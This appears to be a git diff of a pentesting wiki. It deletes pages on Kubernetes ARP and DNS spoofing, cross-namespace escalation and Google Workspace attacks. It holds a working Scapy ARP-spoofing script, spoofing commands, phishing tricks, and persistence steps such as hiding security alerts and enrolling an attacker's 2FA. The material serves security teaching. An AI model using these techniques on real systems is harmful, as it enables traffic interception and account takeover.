- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Introduction - -Kubernetes by default **connects** all the **containers running in the same node** (even if they belong to different namespaces) down to **Layer 2** (ethernet). This allows a malicious containers to perform an [**ARP spoofing attack**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) to the containers on the same node and capture their traffic. - -In the scenario 4 machines are going to be created: - -* ubuntu-pe: Privileged machine to escape to the node and check metrics (not needed for the attack) -* **ubuntu-attack**: **Malicious** container in default namespace -* **ubuntu-victim**: **Victim** machine in kube-system namespace -* **mysql**: **Victim** machine in default namespace - -```yaml -echo 'apiVersion: v1 -kind: Pod -metadata: - name: ubuntu-pe -spec: - containers: - - image: ubuntu - command: - - "sleep" - - "360000" - imagePullPolicy: IfNotPresent - name: ubuntu-pe - securityContext: - allowPrivilegeEscalation: true - privileged: true - runAsUser: 0 - volumeMounts: - - mountPath: /host - name: host-volume - restartPolicy: Never - hostIPC: true - hostNetwork: true - hostPID: true - volumes: - - name: host-volume - hostPath: - path: / ---- -apiVersion: v1 -kind: Pod -metadata: - name: ubuntu-attack - labels: - app: ubuntu -spec: - containers: - - image: ubuntu - command: - - "sleep" - - "360000" - imagePullPolicy: IfNotPresent - name: ubuntu-attack - restartPolicy: Never ---- -apiVersion: v1 -kind: Pod -metadata: - name: ubuntu-victim - namespace: kube-system -spec: - containers: - - image: ubuntu - command: - - "sleep" - - "360000" - imagePullPolicy: IfNotPresent - name: ubuntu-victim - restartPolicy: Never ---- -apiVersion: v1 -kind: Pod -metadata: - name: mysql -spec: - containers: - - image: mysql:5.6 - ports: - - containerPort: 3306 - imagePullPolicy: IfNotPresent - name: mysql - env: - - name: MYSQL_ROOT_PASSWORD - value: mysql - restartPolicy: Never' | kubectl apply -f - -``` - -```bash -kubectl exec 
-it ubuntu-attack -- bash -c "apt update; apt install -y net-tools python3-pip python3 ngrep nano dnsutils; pip3 install scapy; bash" -kubectl exec -it ubuntu-victim -n kube-system -- bash -c "apt update; apt install -y net-tools curl netcat mysql-client; bash" -kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash" -``` - -## Basic Kubernetes Networking - -If you want more details about the networking topics introduced here, go to the references. - -### ARP - -Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called β€œ**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP. - -![](<../../.gitbook/assets/image (637) (1).png>) - -This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2). 
- -{% hint style="warning" %} -Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.** -{% endhint %} - -### DNS - -In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace: - -```bash -kubectl -n kube-system describe services -Name: kube-dns -Namespace: kube-system -Labels: k8s-app=kube-dns - kubernetes.io/cluster-service=true - kubernetes.io/name=KubeDNS -Annotations: prometheus.io/port: 9153 - prometheus.io/scrape: true -Selector: k8s-app=kube-dns -Type: ClusterIP -IP Families: -IP: 10.96.0.10 -IPs: 10.96.0.10 -Port: dns 53/UDP -TargetPort: 53/UDP -Endpoints: 172.17.0.2:53 -Port: dns-tcp 53/TCP -TargetPort: 53/TCP -Endpoints: 172.17.0.2:53 -Port: metrics 9153/TCP -TargetPort: 9153/TCP -Endpoints: 172.17.0.2:9153 -``` - -In the previous info you can see something interesting, the **IP of the service** is **10.96.0.10** but the **IP of the pod** running the service is **172.17.0.2.** - -If you check the DNS address inside any pod you will find something like this: - -``` -cat /etc/resolv.conf -nameserver 10.96.0.10 -``` - -However, the pod **doesn't know** how to get to that **address** because the **pod range** in this case is 172.17.0.10/26. - -Therefore, the pod will send the **DNS requests to the address 10.96.0.10** which will be **translated** by the cbr0 **to** **172.17.0.2**. - -{% hint style="warning" %} -This means that a **DNS request** of a pod is **always** going to go the **bridge** to **translate** the **service IP to the endpoint IP**, even if the DNS server is in the same subnetwork as the pod. - -Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is going to be able to **intercept the traffic** between **each pod** in the **subnetwork** and the **bridge** and **modify** the **DNS responses** from the DNS server (**DNS Spoofing**). 
- -Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses. -{% endhint %} - -## ARP Spoofing in pods in the same Node - -Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**. - -### Scapy - -```bash -python3 /tmp/arp_spoof.py -Enter Target IP:172.17.0.10 #ubuntu-victim -Enter Gateway IP:172.17.0.9 #mysql -Target MAC 02:42:ac:11:00:0a -Gateway MAC: 02:42:ac:11:00:09 -Sending spoofed ARP responses - -# Get another shell -kubectl exec -it ubuntu-attack -- bash -ngrep -d eth0 - -# Login from ubuntu-victim and mysql and check the unencrypted communication -# interacting with the mysql instance -``` - -{% code title="arp_spoof.py" %} -```python -#From https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87#file-arpspoofer-py -from scapy.all import * - -def getmac(targetip): - arppacket= Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip) - targetmac= srp(arppacket, timeout=2 , verbose= False)[0][0][1].hwsrc - return targetmac - -def spoofarpcache(targetip, targetmac, sourceip): - spoofed= ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac) - send(spoofed, verbose= False) - -def restorearp(targetip, targetmac, sourceip, sourcemac): - packet= ARP(op=2 , hwsrc=sourcemac , psrc= sourceip, hwdst= targetmac , pdst= targetip) - send(packet, verbose=False) - print("ARP Table restored to normal for", targetip) - -def main(): - targetip= input("Enter Target IP:") - gatewayip= input("Enter Gateway IP:") - - try: - targetmac= getmac(targetip) - print("Target MAC", targetmac) - except: - print("Target machine did not respond to ARP broadcast") - quit() - - try: - gatewaymac= getmac(gatewayip) - print("Gateway MAC:", gatewaymac) - except: - print("Gateway is unreachable") - quit() - try: - print("Sending spoofed ARP responses") - while True: - spoofarpcache(targetip, 
targetmac, gatewayip) - spoofarpcache(gatewayip, gatewaymac, targetip) - except KeyboardInterrupt: - print("ARP spoofing stopped") - restorearp(gatewayip, gatewaymac, targetip, targetmac) - restorearp(targetip, targetmac, gatewayip, gatewaymac) - quit() - -if __name__=="__main__": - main() - -# To enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward -``` -{% endcode %} - -### ARPSpoof - -```bash -apt install dsniff -arpspoof -t 172.17.0.9 172.17.0.10 -``` - -## DNS Spoofing - -As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**. - -You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/) - -In our scenario, **download** the **tool** in the attacker pod and create a \*\*file named `hosts` \*\* with the **domains** you want to **spoof** like: - -``` -cat hosts -google.com. 1.1.1.1 -``` - -Perform the attack to the ubuntu-victim machine: - -``` -python3 exploit.py --direct 172.17.0.10 -[*] starting attack on direct mode to pod 172.17.0.10 -Bridge: 172.17.0.1 02:42:bd:63:07:8d -Kube-dns: 172.17.0.2 02:42:ac:11:00:02 - -[+] Taking over DNS requests from kube-dns. press Ctrl+C to stop -``` - -```bash -#In the ubuntu machine -dig google.com -[...] -;; ANSWER SECTION: -google.com. 
1 IN A 1.1.1.1 -``` - -{% hint style="info" %} -If you try to create your own DNS spoofing script, if you **just modify the the DNS response** that is **not** going to **work**, because the **response** is going to have a **src IP** the IP address of the **malicious** **pod** and **won't** be **accepted**.\ -You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction). -{% endhint %} - -## References - -* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) -* [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters) - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/pentesting-kubernetes/namespace-escalation.md b/cloud-security/pentesting-kubernetes/namespace-escalation.md deleted file mode 100644 index 655a54faa..000000000 --- a/cloud-security/pentesting-kubernetes/namespace-escalation.md +++ /dev/null @@ -1,66 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. - -Here are some techniques you can try to escape to a different namespace: - -## Abuse K8s privileges - -Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. - -For more info about which privileges you can abuse read: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -## Escape to the node - -If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: - -* Check for **SAs tokens mounted in other docker containers** running in the node -* Check for new **kubeconfig files in the node with extra permissions** given to the node -* If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet) - -All these techniques are explained in: - -{% content-ref url="../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/workspace-security.md b/cloud-security/workspace-security.md deleted file mode 100644 index 6828e16b7..000000000 --- a/cloud-security/workspace-security.md +++ /dev/null @@ -1,252 +0,0 @@ -# Workspace Security - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Workspace Phishing - -### Generic Phishing Methodology - -{% content-ref url="../generic-methodologies-and-resources/phishing-methodology/" %} -[phishing-methodology](../generic-methodologies-and-resources/phishing-methodology/) -{% endcontent-ref %} - -### Google Groups Phishing - -Apparently by default in workspace members [**can create groups**](https://groups.google.com/all-groups) **and invite people to them**. You can then modify the email that will be sent to the user **adding some links.** The **email will come from a google address**, so it will looks **legit** and people might click on the link. - -### Hangout Phishing - -You might be able either to directly talk with a person just having his email address or sending an invitation to talk. Either way, modify an email account maybe naming it "Google Security" and adding some Google logos, and the people will think they are talking to google: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s) - -Just the **same technique** can be used with **Google Chat**. - -### Google Doc Phishing - -You can create an **apparently legitimate document** and the in a comment **mention some email (like +user@gmail.com)**. Google will **send an email to that email address** notifying that he was mentioned in the document. You can **put a link in that document** to try to make the persona access it. - -### Google Calendar Phishing - -You can **create a calendar event** and add as many email address of the company you are attacking as you have. Schedule this calendar event in **5 or 15 min** from the current time. Make the event looks legit and **put a comment indicating that they need to read something** (with the **phishing link**).\ -To make it looks less suspicious: - -* Set that the **receivers cannot see the other invited people** -* Do **NOT send emails notifying about the event**. 
Then, the people will only see their warning about a meeting in 5mins and that they need to read that link. -* Apparently using the API you can set to **True** that **people** has **accepted** the event and even create **comments on their behalf**. - -### OAuth Phishing - -Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trust** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions). - -Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and from Workspace admins can even prevent people to accept OAuth applications. More on this in the OAuth section. - -## Password Spraying - -In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you can use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) who will use AWS lambdas to change IP address. - -## Oauth Apps - -**Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP... - -When creating an application to **act on behalf other users**, the developer needs to create an **OAuth app inside GCP** and indicate the scopes (permissions) the app needs to access the users data.\ -When a **user** wants to **use** that **application**, he will be **prompted** to **accept** that the application will access to his data specified in the scopes. - -This is a very juicy way to **phish** non-technical users into using **applications that access sensitive information** because they might not understand the consequences. Therefore, in organizations accounts, there are ways to prevent this from happening. 
- -### Unverified App prompt - -As it was mentioned, google will always present a **prompt to the user to accept** the permissions he is giving the application on his behalf. However, if the application is considered **dangerous**, google will show **first** a **prompt** indicating that it's **dangerous** and **making more difficult** to the user to grant the permissions to the app. - -This prompt appears in apps that: - -* Uses any scope that can access to private data (Gmail, Drive, GCP, BigQuery...) -* Apps with less than 100 users (apps > 100 a review process is needed also to not show the unverified prompt) - -### Interesting Scopes - -You can [**find here**](https://developers.google.com/identity/protocols/oauth2/scopes) a list of all the Google OAuth scopes. - -* **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP. -* **directory.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users. - -## App Scripts - -Developers can create App Scripts and set them as a standalone project or bound them to Google Docs/Sheets/Slides/Forms. 
App Scripts is code that will be triggered when a user with editor permission access the doc (and after accepting the OAuth prompt) - -However, even if the app isn't verified there are a couple of ways to not show that prompt: - -* If the publisher of the app is in the same Workspace as the user accessing it -* If the script is in a drive of the user - -### Copy Document Unverified Prompt Bypass - -When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\ -If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document.** - -{% hint style="warning" %} -If someone creates a **copy** of that **document** that **contained the App Script**, he will also be **copying the App Script**, therefore when he **opens** the copied **spreadsheet**, the **regular OAuth prompt** will appear **bypassing the unverified prompt**, because **the user is now the author of the App Script of the copied file**. -{% endhint %} - -This method will be able to bypass also the Workspace admin restriction: - -![](<../.gitbook/assets/image (662) (1) (1) (1) (1).png>) - -But can be prevented with: - -![](<../.gitbook/assets/image (632).png>) - -### Shared Document Unverified Prompt Bypass - -Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**. - -{% hint style="warning" %} -This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it. - -This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document. 
-{% endhint %} - -{% hint style="danger" %} -This also means that if an **App Script already existed** and people has **granted access**, anyone with **Editor** permission to the doc can **modify it and abuse that access.**\ -To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags. -{% endhint %} - -## Post-Exploitation - -### Google Groups Privesc - -By default in workspace a **group** can be **freely accessed** by any member of the organization.\ -Workspace also allow to **grant permission to groups** (even GCP permissions), so if groups can be joined and they have extra permissions, an attacker may **abuse that path to escalate privileges**. - -You potentially need access to the console to join groups that allow to be joined by anyone in the org. Check groups information in [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups). - -### Privesc to GCP Summary - -* Abusing the **google groups privesc** you might be able to escalate to a group with some kind of privileged access to GCP -* Abusing **OAuth applications** you might be able to impersonate users and access to GCP on their behalf - -### Access Groups Mail info - -If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**. 
- -### Takeout - Download Everything Google Knows about an account - -If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none) - -### Vault - Download all the Workspace data of users - -If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**. - -### Contacts download - -From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es\&tab=mC) you can download all the **contacts** of the user. - -### Cloudsearch - -In [**https://cloudsearch.google.com/**](https://cloudsearch.google.com) you can just search **through all the Workspace content** (email, drive, sites...) a user has access to. Ideal to **find quickly sensitive information**. - -### Currents - -In [**https://currents.google.com/**](https://currents.google.com) you can access a Google **Chat**, so you might find sensitive information in there. - -### Google Drive Mining - -When **sharing** a document yo can **specify** the **people** that can access it one by one, **share** it with your **entire company** (**or** with some specific **groups**) by **generating a link**. - -When sharing a document, in the advance setting you can also **allow people to search** for this file (by **default** this is **disabled**). However, it's important to note that once users views a document, it's searchable by them. - -For sake of simplicity, most of the people will generate and share a link instead of adding the people that can access the document one by one. - -Some proposed ways to find all the documents: - -* Search in internal chat, forums... -* **Spider** known **documents** searching for **references** to other documents. 
You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser) - -### **Keep Notes** - -In [**https://keep.google.com/**](https://keep.google.com) you can access the notes of the user, **sensitive** **information** might be saved in here. - -### Persistence inside a Google account - -If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) and **regenerate the 2FA backup codes** to know that even if the user change the password you **will be able to access his account**. Another option **instead** of **regenerating** the codes is to **enrol your own authenticator** app in the 2FA. - -### Persistence via OAuth Apps - -If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can configure to **disallow external and/or internal OAuth apps** without being reviewed.\ -It is pretty common to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**. - -### Persistence via delegation - -You can just **delegate the account** to a different account controlled by the attacker. - -### Persistence via Android App - -If you have a **session inside victims google account** you can browse to the **Play Store** and **install** a **malware** you have already uploaded it directly **in the phone** to maintain persistence and access the victims phone. 
- -### **Persistence via Gmail** - -* You can create **filters to hide** security notifications from Google - * from: (no-reply@accounts.google.com) "Security Alert" - * Hide password reset emails -* Create **forwarding address to forward sensitive information** (or everything) - You need manual access. - * Create a forwarding address to send emails that contains the word "password" for example -* Add **recovery email/phone under attackers control** - -### **Persistence via** App Scripts - -You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. - -The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **scope** `script.scriptapp`, but **apparently thats not necessary** as long as you have declare some other scope. - -### **Administrate Workspace** - -In [**https://admin.google.com**/](https://admin.google.com), if you have enough permissions you might be able to modify settings in the Workspace of the whole organization. - -You can also search emails through all the users invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch) - -## Account Compromised Recovery - -* Log out of all sessions -* Change user password -* Generate new 2FA backup codes -* Remove App passwords -* Remove OAuth apps -* Remove 2FA devices -* Remove email forwarders -* Remove emails filters -* Remove recovery email/phones -* Remove bad Android Apps -* Remove bad account delegations - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index 0130d3efe..c7bee7ce7 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -61,7 +61,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>) +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (3).png>) And then use the following code diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index aa1adc29e..404713484 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -156,7 +156,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). 
-![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (2).png>) ### USB Detective diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index bfa5022dc..71bbbe06d 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -14,7 +14,7 @@ -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -159,7 +159,7 @@ echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -371,7 +371,7 @@ Now we just copy-paste the text into our windows-shell. And it will automaticall * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! 
{% embed url="https://go.intigriti.com/hacktricks" %} diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md index fa2b57c08..38671ec56 100644 --- a/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/generic-methodologies-and-resources/phishing-methodology/README.md @@ -337,7 +337,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors -![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png>) {% hint style="info" %} It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\ diff --git a/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md index 593c607ab..a2f86357d 100644 --- a/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md +++ b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md @@ -4,25 +4,19 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity 